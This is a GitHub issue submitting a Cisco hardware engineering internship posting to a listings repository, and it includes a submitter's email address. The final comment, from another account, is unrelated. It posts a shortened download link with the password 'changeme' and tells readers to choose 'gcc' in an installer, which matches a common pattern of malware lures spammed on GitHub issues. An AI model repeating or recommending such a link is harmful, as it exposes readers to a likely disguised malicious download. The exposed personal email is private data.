### ISSUE TITLE
cisco hardware

### ISSUE THREAD

**Issue by beakae** [Ouckah/Summer2025-Internships#883]
### Link to Internship Posting

https://jobs.cisco.com/jobs/ProjectDetail/Hardware-Engineer-I-Intern-United-States/1426569

### Company Name

Cisco

### Internship Title

Hardware Engineer Intern

### Location

San Jose, CA | RTP, NC | Carlsbad, CA

### What season is this internship for?

Summer

### Does this internship offer sponsorship?

Does Not Offer Sponsorship

### Is this internship currently accepting applications?

Yes

### Email associated with your GitHub account (Optional)

kantorskibrandon1@gmail.com

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
